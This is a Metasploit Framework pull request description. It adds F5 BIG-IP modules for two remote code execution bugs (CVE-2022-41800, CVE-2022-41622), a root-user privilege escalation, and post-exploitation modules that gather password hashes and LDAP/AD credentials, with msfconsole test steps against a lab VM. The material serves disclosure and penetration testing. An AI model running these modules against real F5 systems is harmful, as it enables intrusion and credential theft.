rapid7/metasploit-framework
# F5 modules

This adds a bunch of modules for exploiting F5 targets (using bugs found by Rapid7 over the summer and released in November/2022). There are two exploit libraries, one for an authenticated RCE and the other for a CSRF-based RCE:

* exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
* exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622

I also wrote a mixin for interfacing with their proprietary "mcp" database:

* lib/msf/core/post/linux/f5_mcp.rb

A local privilege escalation module (any user -> root) (they didn't give this a CVE) that uses the unprotected "mcp" socket to create a root user:

* exploit/linux/local/f5_create_user

And three post-exploitation "gather" modules that pull interesting data (such as password hashes and upstream passwords like LDAP/AD) from the database:

* post/linux/gather/f5_enum_db_variables - gather config info from the mcp DB
* post/linux/gather/f5_enum_users - get usernames/passwords of all users in the mcp DB
* post/linux/gather/f5_passwords - get passwords (such as LDAP, AD, Radius, TACACS+, etc) from the mcp DB

## Verification

This was just patched today, but I've been using F5 Big-IP 17.0.0.1 for testing. It's a free download (you need to create an account) on https://downloads.f5.com (or in our Vulnerable Software share). It comes as a VM image that you just need to boot, log in as admin/admin, and set a password.

To test the modules, I've included documentation along with the modules. For quick reference I'll summarize the two RCE modules, and the rest are in .md files (though the only complex one is CVE-2022-41622).

CVE-2022-41800:

1. Install the application
2. Start `msfconsole`
3. Do: `use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800`
4. Do `set RHOST <target>` / `set HttpUsername admin` / `set HttpPassword <thepasswordyouchose>`
5. Do: `run`
6. You should get a session

And CVE-2022-41622

1. Install the application
2. Start `msfconsole`
3. Do: `use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622`
4. Do `set TARGET_HOST <target>` / `set LHOST <yourtest>`
5. Do: `run`
6. You should get a url such as: `http://10.0.0.179:8080/ddgjZO`
7. Open a browser and visit that URL
8. If you don't already have an HTTP Basic session, it'll ask for your credentials (the `admin` account from earlier works great)
